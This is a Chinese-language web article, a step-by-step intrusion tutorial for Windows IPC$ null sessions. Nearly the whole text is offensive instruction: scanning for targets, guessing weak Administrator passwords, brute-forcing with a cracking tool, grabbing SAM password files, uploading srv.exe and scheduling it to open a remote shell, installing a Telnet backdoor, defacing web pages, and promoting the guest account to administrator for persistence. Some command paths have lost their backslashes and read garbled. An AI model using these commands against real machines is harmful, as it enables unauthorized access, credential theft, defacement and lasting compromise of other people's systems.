IPC$空連接主機步驟與簡單入侵示例
責編:admin |2015-02-10 16:13:29IPC$的定義:IPC$是共享“命名管道”的資源,它是為了讓進程間通信而開放的命名管道,在遠程管理計算機和查看計算機的共享資源時使用。
IPC$的作用:利用IPC$可以與目標主機建立一個空的連接(無需用戶名與密碼),而利用這個空的連接,我們就可以得到目標主機上的用戶列表。用“流光”的IPC$探測功能,可以得到用戶列表,并配合字典,進行密碼嘗試。
IPC$空連接主機步驟:
1、首先要掃到能建立IPC$空連接的主機,有了目標才能進攻,推薦使用安全焦點的xscan_gui v1.3,該軟件使用方法很簡單,而且速度快,也許還能掃出其他漏洞。
2、詳細了解NET命令,做IPC$空連接主機是不可不知NET命令使用的。
3、如果知道對方的用戶名和密碼,就用下面這個命令:
net use \127.0.0.1ipc$ ”密碼” /user:”用戶名”
退出的命令是:
net use \127.0.0.1ipc$ /delte
4、大部分情況下我們都不知道對方機器的用戶名和密碼。這就需要知道他的IP,我們使用用ping命令,格式為:ping www.xxx.com(如果用QQ聊天更簡單,現在好多QQ都顯IP的), 用追捕查他的操作系統,用戶名等。現在信息都有了,然后大家試試弱智點的密碼,如:123,12345,123456,用戶名就是Administrator。運氣好的話就可以進入了。
5、實在猜不出密碼的話就只有用榕哥的大作――流光,運行探測――掃描POP3/FTP/NT/SQL主機,會出現“主機掃描設置”,在“掃描范圍”中分別填寫“開始地址”與“結束地址”,這步你可以選擇要掃描的IP段,也可以只填某一IP,掃描主機類型”選擇“NT/98”,然后開始掃描,如果單掃某一IP,我建議掃描主機類型選ALL,選項選中的內容不要取消,這樣可以看看他的機器是什么顏色的,具體表示看下表:
紅色:該主機安裝了FrontPage擴展,并沒有權限設置。如果掃到紅色的,你可以打開FrontPage,在打開那里填上他的IP地址,接著你就知道怎么做了。
藍色:表示該主機上安裝了FrontPage擴展。
黑色:遠程執行命令。你可以單擊該主機――連接,就可以用DOS命令操作遠程計算機,如:dir c:
黃色:直接下載對方SAM文件(SAM文件是NT下儲存用戶和密碼的文件,下載后用LC3可以解開)。
綠色:將對方SAM文件上傳到指定的FTP服務器。
6、現在知道了他主機的情況,就可以開始探測他的用戶列表了!右鍵點IPC$主機-探測-探測所有IPC$用戶列表,下面兩個對話框的設置都選上,我們只要IPC$管理員的弱口令。在結果點擊右鍵,探測用戶列表,Administrstor(超級用戶)直接探測到ADMIN的密碼,如果實在不行,我們還可以拿其他用戶“開刀”,然后在想辦法讓他變成超級用戶。
7、得到用戶名和密碼我們就可以連接了。打開win2000下的cmd.exe(也就是命令提示符)。然后重復第二步教過的連接連接命令:
net use \127.0.0.1ipc$ ”密碼” /user:”用戶名”
成功連接后顯示命令成功完成。
8、現在你可以用copy命令把你想要上傳的東西放到他的機器里。
9、如果你想黑他頁面的話就找到網頁所在的目錄,如:c:inetpubwwwroot,用命令:
copy c:index.htm \IP地址c$inetpubwwwroot
這里的c:index.htm指的是你作好的網頁,上傳替換掉原先的文件就可以改他的主頁。
其他的操作方式就自己開發吧!以下提供幾條有用的命令:
建立空連接
net use \IPipc$ ”" /user:”"
建立非空連接
net use \IPipc$ ”用戶名” /user:”密碼”
映射默認共享
net use z: \IPc$ ”密碼” /user:”用戶名” (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令:
net use z: \IPc$
刪除一個ipc$連接
net use \IPipc$ /del
刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
經典入侵示例
1.C:>net use \127.0.0.1IPC$ ”" /user:”admintitrators”
這是用《流光》掃到的用戶名為administrators,密碼為”空”的IP地址,如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為”空”,所以第一個引號處就不用輸入,后面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
2. C:>copy srv.exe \127.0.0.1admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:winntsystem32,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什么地方去了)。
3.C:>net time \127.0.0.1
查查時間,發現127.0.0.1 的當前時間是2005/5/1上午11:00,命令成功完成。
4.C:>at \127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然無法啟動)。
5.C:>net time \127.0.0.1
再查查到時間沒有,如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就準備開始下面的命令。
6.C:>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意端口是99。Telnet默認的是23端口,但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了。
7.C:>copy ntlm.exe \127.0.0.1admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8.C:WINNTsystem32>ntlm
輸入ntlm啟動(這里的C:WINNTsystem32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現”DONE”的時候,就說明已經啟動正常。然后使用”net start telnet”來開啟Telnet服務!
9.Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!然后你想做什么就做什么吧。
為了以防萬一,我們再把guest激活加到管理組。
10.C:>net user guest /active:yes
將對方的Guest用戶激活。
11.C:>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼。
12.C:>net localgroup administrators guest /add
將Guest變為Administrator (如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這臺計算機) 。
其他操作就看您的能力和水平了,自己揣摩吧!
注:此為本人幾年前收藏的經典網文,雖然好多命令和工具均已無法正常運行,但其思路和方法仍然值得網絡安全愛好者學習,在此向原作者表示致敬!